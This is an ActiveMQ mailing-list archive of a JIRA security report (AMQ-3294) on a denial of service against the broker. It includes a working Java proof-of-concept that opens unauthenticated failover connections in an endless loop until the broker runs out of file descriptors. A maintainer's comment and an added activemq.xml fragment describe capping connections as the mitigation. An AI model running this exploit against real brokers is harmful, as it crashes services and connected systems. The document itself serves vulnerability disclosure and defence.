activemq-dev mailing list archives
From "Gary Tully (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (AMQ-3294) ActiveMQ failover Denial of Service
Date Wed, 31 Aug 2011 16:51:09 GMT

[ https://issues.apache.org/jira/browse/AMQ-3294?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13094680#comment-13094680 ]

Gary Tully commented on AMQ-3294:
---------------------------------

https://issues.apache.org/jira/browse/AMQ-1928 helps here: it allows you to limit the number of concurrent connections. Set this to 10 and the DoS attack will fail.

> ActiveMQ failover Denial of Service
> -----------------------------------
>
>                 Key: AMQ-3294
>                 URL: https://issues.apache.org/jira/browse/AMQ-3294
>             Project: ActiveMQ
>          Issue Type: Bug
>          Components: Broker
>    Affects Versions: 5.2.0, 5.5.0
>         Environment: Linux ubuntu 2.6.32-30-generic and other Linux versions
>            Reporter: Luca Carettoni
>              Labels: security
>
> Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can trigger a Denial of Service condition against the broker service.
> In detail, an attacker can issue multiple ActiveMQ openwire connection requests using the following connection string:
> failover:tcp://<IP>:61616
> Due to the 'failover' mechanism, all TCP connections remain active even if a valid session is not created.
> Please note that no valid credentials have been used.
> After a few thousand requests, a "java.net.SocketException: Too many open files" exception is triggered causing the freeze/crash of the broker. Connected systems may crash as well.
> During my test, the attack took around 4 minutes (in a local network) and it is highly reliable. This is most likely an abuse of the 'failover' functionality.
> I've been testing version 5.2.0 and also the latest 5.5.0 release. As both releases are affected, I assume that this issue is present in other versions as well. The problem appears in the default configuration as well as with different authentication plugins enabled.
> Proof-Of-Concept:
> --------------------
> package openwireclient;
> import javax.jms.*;
> import org.apache.activemq.ActiveMQConnectionFactory;
> public class GoAndCrash {
>     private static String url = "failover:tcp://";
>     public static void main(String[] args) throws JMSException {
>         System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");
>         url = url.concat(args[0] + ":" + args[1]);
>         int cont = 0;
>         while (true) {
>             try {
>                 System.out.println("[*] Request #" + cont);
>                 ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("invalidUser", "invalidPass", url);
>                 Connection connection = connectionFactory.createConnection();
>                 cont++;
>                 connection.start();
>             } catch (Exception ex) {
>                //do nothing
>             }
>         }
>     }
> }
> --------------------
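The per-connector cap that Gary points to under AMQ-1928 is exposed, in the ActiveMQ releases that carry that change, as the maximumConnections option on a transport connector URI. The activemq.xml fragment below is an added illustration written for this page; it is not part of the JIRA thread or of the ActiveMQ distribution. The connector name, bind address and numeric values are placeholders, and the option name comes from my reading of the ActiveMQ transport reference, so confirm it against the documentation for the broker version you run.

```xml
<!-- Fragment of activemq.xml, inside <broker> ... </broker>.
     Constructed example: names, addresses and limits are placeholders. -->
<transportConnectors>

    <!-- Before: a plain OpenWire connector. Every accepted socket consumes a
         file descriptor in the broker process whether or not the client ever
         authenticates, which is the resource the report above exhausts. -->
    <!--
    <transportConnector name="openwire" uri="tcp://0.0.0.0:61616"/>
    -->

    <!-- After: the same connector with a hard ceiling on concurrent sockets.
         Once the ceiling is reached the connector refuses further connections
         instead of accepting them into the broker's descriptor budget.
         Assumed option name (from the ActiveMQ transport reference):
         maximumConnections. The value 1000 is a placeholder; size it from the
         broker's open-file limit and the number of legitimate clients. -->
    <transportConnector name="openwire"
                        uri="tcp://0.0.0.0:61616?maximumConnections=1000"/>

</transportConnectors>
```

The cap is enforced per connector, so each transportConnector in the file needs its own value, and the sum across connectors should stay well below the open-file limit of the user the broker runs as (check it with ulimit -n in that user's shell). Refused connections surface in the broker log as the connector rejecting the socket, which is also a useful signal to alert on: a sustained run of refusals from a single source is the footprint of the behaviour described in the report.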

--
This message is automatically generated by JIRA.
For more information on JIRA, see: http://www.atlassian.com/software/jira
